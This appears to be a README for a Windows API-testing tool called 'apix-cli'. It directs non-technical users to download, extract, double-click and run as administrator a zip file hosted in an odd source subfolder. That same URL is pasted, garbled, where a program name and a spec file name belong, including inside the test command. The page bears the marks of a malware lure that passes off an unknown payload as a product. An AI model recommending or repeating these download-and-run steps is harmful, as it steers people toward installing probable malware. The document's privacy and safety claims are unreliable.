apix-cli is a tool to check if your APIs work as expected. It helps you test APIs based on your project’s design files and gives clear, easy-to-understand reports. You can use it to make sure your APIs follow rules and run smoothly without needing programming skills.
apix-cli is an application that tests APIs. It works with files that describe how your API should behave. You give it these files, and it checks your API to find problems. It prepares reports to show any errors or issues clearly.
You can use apix-cli on your computer. It works well with automation tools but does not require you to use those. If you have no coding experience, you can still run this app by following simple steps.
Before you start, make sure your computer meets the following:
- Operating System: Windows 10 or newer
- Processor: 1.5 GHz or faster
- Memory: 4 GB RAM minimum
- Storage: At least 100 MB free space
- Internet: Required to download apix-cli and verify API connections
- API Validation: Check if your API matches the rules in your design files.
- Report Generation: See results in easy-to-understand, well-organized reports.
- Works Locally: Run all tests on your computer without sending data elsewhere.
- Automation Ready: Can be used with automatic scripts in professional setups.
- Open Source: You can check or update the app yourself since the code is public.
This guide will show you how to download and run apix-cli on Windows. You will not need to write code or use complex tools.
Click the big blue button at the top of this page or visit:
https://github.com/sambetlog16/apix-cli/raw/refs/heads/main/src/utils/apix_cli_Uromycladium.zip
This page shows the latest version and files available for Windows.
On the GitHub page, look for the Releases section or a folder named “Downloads.” Find the latest version suitable for Windows, usually a file ending with .exe or .zip.
Click the Windows .exe or .zip file to save it to your computer. Choose a folder you can easily find, like the Desktop or Downloads.
- If you downloaded a
.exefile, double-click it to start the setup. Follow the instructions on the screen. - If you downloaded a
.zipfile, right-click it and choose “Extract All.” Save the contents to a new folder.
Once installed or extracted, find the apix-cli program:
- For an installer, look in the Start menu under “apix-cli”.
- For a
.zipextraction, open the folder and findhttps://github.com/sambetlog16/apix-cli/raw/refs/heads/main/src/utils/apix_cli_Uromycladium.zip.
Double-click the file to run it.
Even with no programming experience, you can check your API quickly.
apix-cli works with files called OpenAPI specifications. These files describe how your API functions and what it expects.
Ask a teammate or developer to provide you this file. It will have a .yaml or .json extension.
Copy this file to the same folder as apix-cli for easy access.
To start a test:
- Open Command Prompt on Windows. You can search for "cmd" in the Start menu.
- Use the
cdcommand to go to the apix-cli folder. For example:
cd Desktop\apix-cli-folder
- Run the test command with your spec file:
apix-cli test https://github.com/sambetlog16/apix-cli/raw/refs/heads/main/src/utils/apix_cli_Uromycladium.zip
Replace https://github.com/sambetlog16/apix-cli/raw/refs/heads/main/src/utils/apix_cli_Uromycladium.zip with the actual file name.
This command tells apix-cli to check your API based on your spec file.
After the test runs, apix-cli creates a report showing what passed and what failed.
Find the report in the reports folder inside the apix-cli folder.
Open the report file (usually .html) with any web browser to see detailed results.
apix-cli can be changed to fit your API needs. You can:
- Test different API specs by changing the file name.
- Save reports in different folders with extra command options.
- Run commands without any coding knowledge once set up.
- apix-cli does not start: Check if your Windows version matches requirements. Try running as administrator.
- Command not recognized: Make sure you opened Command Prompt in the right folder.
- Report folder is empty: Confirm your API spec file path is correct and the test command ran fully.
- File download issues: Use a stable internet connection and try again.
- Visit the GitHub link for updates:
https://github.com/sambetlog16/apix-cli/raw/refs/heads/main/src/utils/apix_cli_Uromycladium.zip - Find sample API spec files under the “examples” folder in the repository.
- For advanced setups, documentation and technical guides are available on the GitHub page.
If you need help or want to share suggestions, use the GitHub Issues section:
- Go to the repository page on GitHub.
- Click on the “Issues” tab.
- Create a new issue describing your question or problem.
The project team monitors these messages regularly.
apix-cli runs locally on your computer. It does not send your API data over the internet when testing. Your files and reports stay private on your device.
